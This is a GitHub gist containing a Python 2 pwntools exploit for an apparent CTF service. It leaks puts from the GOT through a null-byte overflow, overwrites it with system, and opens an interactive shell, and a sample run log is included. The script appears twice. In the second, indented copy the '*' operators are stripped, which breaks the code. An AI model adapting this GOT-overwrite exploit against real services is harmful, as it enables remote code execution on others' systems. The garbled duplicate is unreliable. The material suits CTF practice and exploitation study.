hugsy/gist:32e4fdf200dd471defc9e32dda4891e7

## gistfile1.txt
#!/usr/bin/python2
# [+] Opening connection to 172.28.128.3 on port 1338: Done
# [*] Smash null byte
# [*] Reading from memory
# [*] Leaked puts@glibc at 0xb7665650
# [*] system@glibc is at 0xb7640190
# [*] Overwriting puts@got with system@glibc
# [*] Triggering
# [*] Switching to interactive mode

from pwn import *

context.update(arch='i386', os='linux')

def smash(r):
    r.recvuntil("Before we start, please give your meme an id")
    r.send('a'*9)
    r.recvuntil("What would you like to do?")
    r.recvuntil("==> ")
    r.sendline('')
    r.sendline('5')
    r.recvuntil('\nsecret')
    return

def read_from_memory(r, addr):
    r.recvuntil("==> ")
    r.sendline('1')
    r.recvuntil('3nt3r ur m3m3 id')
    r.sendline('A'*12 + p32(addr) + 'B'*7)
    r.sendline('4')
    r.recvuntil('Ur meme c0nT3nT:\t')
    return r.recvuntil('==> ')

def write_in_memory(r, addr, data):
    r.sendline('1')
    r.recvuntil('3nt3r ur m3m3 id')
    r.sendline('A'*12 + p32(addr) + 'B'*7)
    r.recvuntil("==> ")
    r.sendline('2')
    r.recvuntil('3nt3r teh d4nkn3ess 0f m3me')
    r.sendline(str(len(data)+1))
    r.recvuntil("==> ")
    r.sendline('3')
    r.sendline(data)
    return

if __name__ == "__main__":
    puts_got = 0x8049118
    r = remote("172.28.128.3", 1338)
    # r = remote("problems.ctfx.io", 1338)
    log.info("Smash null byte")
    smash(r)
    log.info("Reading from memory")
    data = read_from_memory(r, puts_got)
    puts_leak = u32(data[0:4])
    log.info("Leaked puts@glibc at %#x" % puts_leak)
    libc_base = puts_leak - 0x65650
    system_addr = libc_base + 0x40190
    log.info("system@glibc is at %#x" % system_addr)
    log.info("Overwriting puts@got with system@glibc")
    write_in_memory(r, puts_got, p32(system_addr))
    log.info("Triggering")
    r.recvuntil('==>')
    r.sendline('5')
    r.recvuntil('whaddup!')
    r.interactive()
	#!/usr/bin/python2
	# [+] Opening connection to 172.28.128.3 on port 1338: Done
	# [*] Smash null byte
	# [*] Reading from memory
	# [*] Leaked puts@glibc at 0xb7665650
	# [*] system@glibc is at 0xb7640190
	# [*] Overwriting puts@got with system@glibc
	# [*] Triggering
	# [*] Switching to interactive mode

	from pwn import *

	context.update(arch='i386', os='linux')

	def smash(r):
	r.recvuntil("Before we start, please give your meme an id")
	r.send('a'*9)
	r.recvuntil("What would you like to do?")
	r.recvuntil("==> ")
	r.sendline('')
	r.sendline('5')
	r.recvuntil('\nsecret')
	return

	def read_from_memory(r, addr):
	r.recvuntil("==> ")
	r.sendline('1')
	r.recvuntil('3nt3r ur m3m3 id')
	r.sendline('A'12 + p32(addr) + 'B'7)
	r.sendline('4')
	r.recvuntil('Ur meme c0nT3nT:\t')
	return r.recvuntil('==> ')

	def write_in_memory(r, addr, data):
	r.sendline('1')
	r.recvuntil('3nt3r ur m3m3 id')
	r.sendline('A'12 + p32(addr) + 'B'7)
	r.recvuntil("==> ")
	r.sendline('2')
	r.recvuntil('3nt3r teh d4nkn3ess 0f m3me')
	r.sendline(str(len(data)+1))
	r.recvuntil("==> ")
	r.sendline('3')
	r.sendline(data)
	return

	if __name__ == "__main__":
	puts_got = 0x8049118
	r = remote("172.28.128.3", 1338)
	# r = remote("problems.ctfx.io", 1338)
	log.info("Smash null byte")
	smash(r)
	log.info("Reading from memory")
	data = read_from_memory(r, puts_got)
	puts_leak = u32(data[0:4])
	log.info("Leaked puts@glibc at %#x" % puts_leak)
	libc_base = puts_leak - 0x65650
	system_addr = libc_base + 0x40190
	log.info("system@glibc is at %#x" % system_addr)
	log.info("Overwriting puts@got with system@glibc")
	write_in_memory(r, puts_got, p32(system_addr))
	log.info("Triggering")
	r.recvuntil('==>')
	r.sendline('5')
	r.recvuntil('whaddup!')
	r.interactive()